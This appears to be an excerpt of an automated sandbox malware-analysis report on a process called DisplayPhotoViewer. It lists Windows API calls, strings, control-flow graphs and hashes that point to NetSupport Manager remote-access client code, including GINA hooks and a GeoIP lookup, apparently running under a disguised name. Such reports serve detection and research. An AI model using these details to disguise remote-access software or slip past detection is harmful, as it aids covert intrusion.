                                                                                                    • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
                                                                                                    • API String ID: 3535843008-1157355927
                                                                                                    • Opcode ID: e45e2e9329b6e2a04c9c72a8dc63433b6374c9d185d685d75f94056064adcd44
                                                                                                    • Instruction ID: 13038bebbc0407b741a54bdcf6c30d7b08854a2d75f5608491db70441526b830
                                                                                                    • Opcode Fuzzy Hash: e45e2e9329b6e2a04c9c72a8dc63433b6374c9d185d685d75f94056064adcd44
                                                                                                    • Instruction Fuzzy Hash: 6342E475E106999FEB11CB60CD80BEEFB75AFC5319F0041D8D80967285EA72AE84CF61
                                                                                                    Function 110702B0 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 294threadtimeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
                                                                                                    • InitializeCriticalSection.KERNEL32(0000000C,?,00000000), ref: 11070395
                                                                                                    • InitializeCriticalSection.KERNEL32(00000024,?,00000000), ref: 1107039B
                                                                                                    • InitializeCriticalSection.KERNEL32(0000003C,?,00000000), ref: 110703A1
                                                                                                    • InitializeCriticalSection.KERNEL32(0000DB1C,?,00000000), ref: 110703AA
                                                                                                    • InitializeCriticalSection.KERNEL32(00000054,?,00000000), ref: 110703B0
                                                                                                    • InitializeCriticalSection.KERNEL32(0000006C,?,00000000), ref: 110703B6
                                                                                                    • _strncpy.LIBCMT ref: 11070418
                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,00000000), ref: 1107047F
                                                                                                    • CreateThread.KERNEL32(00000000,00004000,Function_0006C5A0,00000000,00000000,?), ref: 1107051C
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 11070523
                                                                                                    • SetTimer.USER32(00000000,00000000,000000FA,1105F7A0), ref: 11070567
                                                                                                    • std::exception::exception.LIBCMT ref: 11070618
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 11070633
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                                                    • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                                                    • API String ID: 703120326-1497550179
                                                                                                    • Opcode ID: bc9c69fd0252a195519e0fc26bf5cc27cd1d4f877e0e716d7d386b6e77d425a6
                                                                                                    • Instruction ID: 0f209e49085ac6e6bdb48bab393d88940930d1ef29b69fa8e9b616e1b55bc937
                                                                                                    • Opcode Fuzzy Hash: bc9c69fd0252a195519e0fc26bf5cc27cd1d4f877e0e716d7d386b6e77d425a6
                                                                                                    • Instruction Fuzzy Hash: 95B1D5B5E00745AFE710CBA4CD84FDAF7F4BB49308F0085A9E65997281EB70BA44CB65
                                                                                                    Function 11101110 Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 213libraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
                                                                                                    • OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas), ref: 111011EA
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 111011F9
                                                                                                    • GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 1110120B
                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 11101241
                                                                                                    • GetProcAddress.KERNEL32(?,GrabKM), ref: 1110126E
                                                                                                    • GetProcAddress.KERNEL32(?,LoggedOn), ref: 11101286
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 111012AB
                                                                                                      • Part of subcall function 11107630: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,111085B5,11108150,00000001,00000000), ref: 11107647
                                                                                                      • Part of subcall function 11107630: CreateThread.KERNEL32(00000000,111085B5,00000001,00000000,00000000,0000000C), ref: 1110766A
                                                                                                      • Part of subcall function 11107630: WaitForSingleObject.KERNEL32(?,000000FF,?,111085B5,11108150,00000001,00000000,?,?,?,?,?,1102F5F3), ref: 11107697
                                                                                                      • Part of subcall function 11107630: CloseHandle.KERNEL32(?,?,111085B5,11108150,00000001,00000000,?,?,?,?,?,1102F5F3), ref: 111076A1
                                                                                                    • GetStockObject.GDI32(0000000D), ref: 111012BF
                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 111012CF
                                                                                                    • InitializeCriticalSection.KERNEL32(0000003C), ref: 111012EB
                                                                                                    • InitializeCriticalSection.KERNEL32(111E41A4), ref: 111012F6
                                                                                                      • Part of subcall function 110FF670: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,1117ECB6,000000FF), ref: 110FF743
                                                                                                      • Part of subcall function 110FF670: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 110FF78C
                                                                                                    • CloseHandle.KERNEL32(00000000,Function_000FAEE0,00000001,00000000), ref: 11101339
                                                                                                      • Part of subcall function 110996C0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F0A64,00000030,11137B17,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 110996E1
                                                                                                      • Part of subcall function 110996C0: OpenProcessToken.ADVAPI32(00000000,?,?,110F0A64,00000030,11137B17,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 110996E8
                                                                                                      • Part of subcall function 110996C0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 11099707
                                                                                                    • CloseHandle.KERNEL32(00000000,Function_000FAEE0,00000001,00000000), ref: 1110138A
                                                                                                    • CloseHandle.KERNEL32(00000000,Function_000FAEE0,00000001,00000000), ref: 111013DF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_malloc_memsetwsprintf
                                                                                                    • String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
                                                                                                    • API String ID: 3930710499-403456261
                                                                                                    • Opcode ID: e8ba90978b96cab55415aba3810908860ea4d1640e17fc30acdc6a879146f2be
                                                                                                    • Instruction ID: 6c9ea3e9fbdaa0aaae64d8e31c620b635071e328df7008761fc2cf2c78d098be
                                                                                                    • Opcode Fuzzy Hash: e8ba90978b96cab55415aba3810908860ea4d1640e17fc30acdc6a879146f2be
                                                                                                    • Instruction Fuzzy Hash: 4181C2B5D04755AFDB11CFB89C88B9AFBE4BB48308F004569E569D7280E7749A40CB50
                                                                                                    Function 11130640 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 348windowCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2813 11130640-11130657 2814 11130a82-11130a91 call 11157561 2813->2814 2815 1113065d-11130664 2813->2815 2815->2814 2817 1113066a-11130671 2815->2817 2817->2814 2818 11130677-1113067e 2817->2818 2818->2814 2820 11130684-1113068b 2818->2820 2820->2814 2821 11130691-111306a1 call 1113b380 2820->2821 2824 111306a3-111306aa 2821->2824 2825 111306b0-111306f7 call 11059e50 call 1105f8e0 2821->2825 2824->2814 2824->2825 2830 11130705-1113072e call 11124a30 2825->2830 2831 111306f9-11130700 2825->2831 2834 11130734-11130737 2830->2834 2835 111307ea call 110e3680 2830->2835 2831->2830 2836 11130745 2834->2836 2837 11130739-1113073e 2834->2837 2841 111307ef-111307f1 2835->2841 2840 1113074b-11130756 2836->2840 2837->2836 2839 11130740-11130743 2837->2839 2839->2840 2842 11130758 2840->2842 2843 1113075d-11130775 2840->2843 2844 111307f3-1113080e call 11059e50 2841->2844 2845 11130810-1113081f PostMessageA 2841->2845 2842->2843 2855 111307d1-111307d8 2843->2855 2856 11130777-1113077d 2843->2856 2844->2845 2846 11130825-1113082a 2844->2846 2845->2846 2848 11130835-11130839 2846->2848 2849 1113082c-11130830 call 111075f0 2846->2849 2853 1113083b-11130843 2848->2853 2854 1113085d-11130886 call 111284b0 call 1113cde0 call 11124c30 call 11157121 2848->2854 2849->2848 2859 11130845-1113085b 2853->2859 2860 11130889-11130891 2853->2860 2854->2860 2857 111307e7 2855->2857 2858 111307da-111307e1 call 11129a00 2855->2858 2862 1113077f-11130784 2856->2862 2863 111307cc 2856->2863 2857->2835 2858->2857 2876 111307e3 2858->2876 2859->2860 2864 11130893-111308ad call 11157121 call 11157561 2860->2864 2865 111308ae-111308d4 call 111391f0 call 1113ce00 SetWindowTextA 2860->2865 2862->2863 2868 11130786-1113078b 2862->2868 2863->2855 2887 111308e0-111308f9 call 11157121 * 2 2865->2887 2888 111308d6-111308dd call 1112cf20 2865->2888 2868->2863 2874 1113078d-111307af 2868->2874 2874->2863 2886 111307b1-111307c0 call 1113bd30 2874->2886 2876->2857 2896 111307c2-111307ca 2886->2896 2900 111308fb-111308ff 2887->2900 2901 1113093e-11130942 2887->2901 2888->2887 2896->2863 2896->2896 2902 11130913-1113091a 2900->2902 2903 11130901-11130911 call 1112cf20 2900->2903 2904 11130948-1113094a 2901->2904 2905 11130a0c-11130a0e 2901->2905 2909 11130934 2902->2909 2910 1113091c-11130931 call 11129200 2902->2910 2903->2902 2903->2910 2911 1113096c-11130979 call 110f12c0 2904->2911 2912 1113094c-1113094e 2904->2912 2907 11130a10-11130a12 2905->2907 2908 11130a2d-11130a3a call 110f12c0 2905->2908 2917 11130a23-11130a2a call 11129200 2907->2917 2918 11130a14-11130a1e call 1112cf20 2907->2918 2926 11130a7f-11130a81 2908->2926 2927 11130a3c-11130a4c IsWindowVisible 2908->2927 2909->2901 2910->2909 2911->2926 2929 1113097f-11130990 IsWindowVisible 2911->2929 2912->2911 2914 11130950-11130960 call 1112cf20 2912->2914 2914->2911 2933 11130962-11130969 call 11129200 2914->2933 2917->2908 2918->2917 2926->2814 2927->2926 2932 11130a4e-11130a59 IsWindowVisible 2927->2932 2929->2926 2934 11130996-111309a6 call 1113b380 2929->2934 2932->2926 2935 11130a5b-11130a7d EnableWindow call 11129200 EnableWindow 2932->2935 2933->2911 2934->2926 2942 111309ac-111309c4 GetForegroundWindow IsWindowVisible 2934->2942 2935->2926 2943 111309d1-111309dd call 11129200 2942->2943 2944 111309c6-111309cf EnableWindow 2942->2944 2947 111309df-111309e5 2943->2947 2948 111309ee-11130a0b EnableWindow call 11157561 2943->2948 2944->2943 2947->2948 2949 111309e7-111309e8 SetForegroundWindow 2947->2949 2949->2948
                                                                                                    APIs
                                                                                                      • Part of subcall function 1113B380: GetVersionExA.KERNEL32(111E4A50,75BF8400), ref: 1113B3B0
                                                                                                      • Part of subcall function 1113B380: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1113B3EF
                                                                                                      • Part of subcall function 1113B380: _memset.LIBCMT ref: 1113B40D
                                                                                                      • Part of subcall function 1113B380: _strncpy.LIBCMT ref: 1113B4CF
                                                                                                      • Part of subcall function 1113B380: RegCloseKey.ADVAPI32(00000000), ref: 1113B4DF
                                                                                                    • PostMessageA.USER32(0006029E,000006CF,00000007,00000000), ref: 1113081F
                                                                                                      • Part of subcall function 11059E50: __wcstoi64.LIBCMT ref: 11059E8D
                                                                                                    • SetWindowTextA.USER32(0006029E,00000000), ref: 111308C7
                                                                                                    • IsWindowVisible.USER32(0006029E), ref: 1113098C
                                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 111309AC
                                                                                                    • IsWindowVisible.USER32(0006029E), ref: 111309BA
                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 111309E8
                                                                                                    • EnableWindow.USER32(0006029E,00000001), ref: 111309F7
                                                                                                    • IsWindowVisible.USER32(0006029E), ref: 11130A48
                                                                                                    • IsWindowVisible.USER32(0006029E), ref: 11130A55
                                                                                                    • EnableWindow.USER32(0006029E,00000000), ref: 11130A69
                                                                                                    • EnableWindow.USER32(0006029E,00000000), ref: 111309CF
                                                                                                      • Part of subcall function 11129200: ShowWindow.USER32(0006029E,11130A72,?,11130A72,00000007,?,?,?,?,?,00000000), ref: 1112920E
                                                                                                    • EnableWindow.USER32(0006029E,00000001), ref: 11130A7D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$EnableVisible$Foreground$CloseMessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                                    • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                                    • API String ID: 4194384052-3803836183
                                                                                                    • Opcode ID: cdfb1d8a132c5fa7e36ca89cf2780b25714b2c20742ef3bccfa00988e955d642
                                                                                                    • Instruction ID: 796e1be76f260c7223af6050a5c0908a884d4ced61f47f3172b169961d59ccc3
                                                                                                    • Opcode Fuzzy Hash: cdfb1d8a132c5fa7e36ca89cf2780b25714b2c20742ef3bccfa00988e955d642
                                                                                                    • Instruction Fuzzy Hash: EEC12575F512259BEB02CBE0DD81B6EF7E5AB8076DF014035E9199B28CEB31B904CB91
                                                                                                    Function 11081590 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 218libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(PCIINV.DLL,218EC38C,0B233858,0B233848,?,00000000,11177C6C,000000FF,?,1102FEA2,0B233858,00000000,?,?,?), ref: 110815C5
                                                                                                      • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
                                                                                                      • Part of subcall function 111078A0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1110859D,00000000,00000001,?,?,?,?,?,1102F5F3), ref: 111078BE
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 110815EB
                                                                                                    • GetProcAddress.KERNEL32(00000000,Cancel), ref: 110815FF
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11081613
                                                                                                    • wsprintfA.USER32 ref: 1108169B
                                                                                                    • wsprintfA.USER32 ref: 110816B2
                                                                                                    • wsprintfA.USER32 ref: 110816C9
                                                                                                    • CloseHandle.KERNEL32(00000000,110813F0,00000001,00000000), ref: 1108181A
                                                                                                      • Part of subcall function 11081200: CloseHandle.KERNEL32(?,74DEF550,?,?,11081840,?,1102FEA2,0B233858,00000000,?,?,?), ref: 11081218
                                                                                                      • Part of subcall function 11081200: CloseHandle.KERNEL32(?,74DEF550,?,?,11081840,?,1102FEA2,0B233858,00000000,?,?,?), ref: 1108122B
                                                                                                      • Part of subcall function 11081200: CloseHandle.KERNEL32(?,74DEF550,?,?,11081840,?,1102FEA2,0B233858,00000000,?,?,?), ref: 1108123E
                                                                                                      • Part of subcall function 11081200: FreeLibrary.KERNEL32(00000000,74DEF550,?,?,11081840,?,1102FEA2,0B233858,00000000,?,?,?), ref: 11081251
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                                                    • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                                    • API String ID: 4263811268-2492245516
                                                                                                    • Opcode ID: a86fe57b31f10a8fd1f8a4d45fefc9f06f705ac6f315f6931de238201940bdc8
                                                                                                    • Instruction ID: b3fd1baa9725eb204d9f0143bf43b0deade306b2ca9ecd04b1689230d0725390
                                                                                                    • Opcode Fuzzy Hash: a86fe57b31f10a8fd1f8a4d45fefc9f06f705ac6f315f6931de238201940bdc8
                                                                                                    • Instruction Fuzzy Hash: 7F717CB5E04B09AFEB10DF799C45BDABBE4EF48354F10452AE95AD7280EB74A500CB90
                                                                                                    Function 1102EB98 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 174synchronizationlibraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • OpenMutexA.KERNEL32(001F0001,?,PCIMutex), ref: 1102ECC4
                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102ECDD
                                                                                                    • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 1102ED5A
                                                                                                    • SetLastError.KERNEL32(00000078,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102ED70
                                                                                                    • WaitForSingleObject.KERNEL32(?,000001F4,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102ED9C
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EDA9
                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EDB4
                                                                                                    • CloseHandle.KERNEL32(00000000,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EDBB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                                    • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                                    • API String ID: 2061479752-1320826866
                                                                                                    • Opcode ID: dc1754725cb1e1368e875043dcdd376bc8ac3effaa6304de6b3869b65dc2b543
                                                                                                    • Instruction ID: 8bf828858e54f3e7324610d0c835327b35d4a510447d5e332511462c8a2ed52c
                                                                                                    • Opcode Fuzzy Hash: dc1754725cb1e1368e875043dcdd376bc8ac3effaa6304de6b3869b65dc2b543
                                                                                                    • Instruction Fuzzy Hash: D7512974E403269BDB11DBB49C88B9EF7B4AF84708F4041ECE909A32C5EB706A44CF61
                                                                                                    Function 1102AD60 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 238synchronizationCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 111076C0: SetEvent.KERNEL32(00000000), ref: 111076E4
                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102ADA5
                                                                                                    • GetTickCount.KERNEL32 ref: 1102ADCA
                                                                                                      • Part of subcall function 110C9870: __strdup.LIBCMT ref: 110C988A
                                                                                                    • GetTickCount.KERNEL32 ref: 1102AEC4
                                                                                                      • Part of subcall function 110CA4D0: wvsprintfA.USER32(?,?,?), ref: 110CA4FB
                                                                                                      • Part of subcall function 110C9920: _free.LIBCMT ref: 110C994D
                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102AFBC
                                                                                                    • CloseHandle.KERNEL32(?), ref: 1102AFD8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                                    • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                                    • API String ID: 596640303-3003987893
                                                                                                    • Opcode ID: c6d6fabeb43193b491f3b7a3061ed14c4b03f5061ab7a825df25e08f525fb4ca
                                                                                                    • Instruction ID: 8d0d2c1425c45e78e3b72e7297f3295dbcb5bcdd9df4785f4c24d3c678d04338
                                                                                                    • Opcode Fuzzy Hash: c6d6fabeb43193b491f3b7a3061ed14c4b03f5061ab7a825df25e08f525fb4ca
                                                                                                    • Instruction Fuzzy Hash: 2F818F78E0060AEBDB05DBE4CC90FEEF7B5AF45708F508158E92567285EB34BA05CB61
